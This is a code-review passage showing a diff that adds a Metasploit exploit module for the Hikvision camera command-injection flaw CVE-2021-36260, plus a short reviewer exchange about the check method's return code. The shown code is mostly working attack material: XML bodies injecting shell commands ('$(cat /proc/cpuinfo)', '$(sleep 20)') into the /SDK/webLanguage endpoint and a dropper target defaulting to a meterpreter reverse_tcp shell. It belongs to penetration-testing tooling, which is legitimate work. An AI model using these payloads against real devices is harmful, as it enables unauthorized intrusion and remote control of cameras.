modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb

```diff
@@ -0,0 +1,178 @@
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  # Check will test two things:
+  # 1. Is the endpoint a Hikvision camera?
+  # 2. Does the endpoint respond as expected to exploitation? This module is
+  #  specifically testing for the blind variant of this attack so we key off
+  #  of the returned HTTP status code. The developer's test target responded
+  #  to exploitation with a 500. Notes from bashis' exploit indicates that
+  #  they saw targets respond with 200 as well, so we'll accept that also.
+  def check
+    # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:
+    # <script>
+    # window.location.href = "/doc/page/login.asp?_" + (new Date()).getTime();
+    # </script>
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/')
+    })
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200
+    return CheckCode::Safe('The target doesn\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')
+
+    payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),
+      'data' => payload
+    }, 10)
+
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)
+
+    # Some cameras are not vulnerable and still respond 500. We can weed them out by making
+    # the remote target sleep and use a low timeout. This might not be good for low latency targets
+    # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all
+    # 500 responses as vulnerable.
+    payload = '<xml><language>$(sleep 20)</language></xml>'
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),
+      'data' => payload
+    }, 10)
+
+    return CheckCode::Appears('As determined by HTTP status replies.') unless res
```

Comment:
I'd think this qualifies for `CheckCode::Vulnerable` as it is actually sort of performing the exploit, but with a benign payload: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method

Reply:
Yeah, I think my initial hesitation was that it was a time-based thing, but it's probably reasonable to respond `CheckCode::Vulnerable`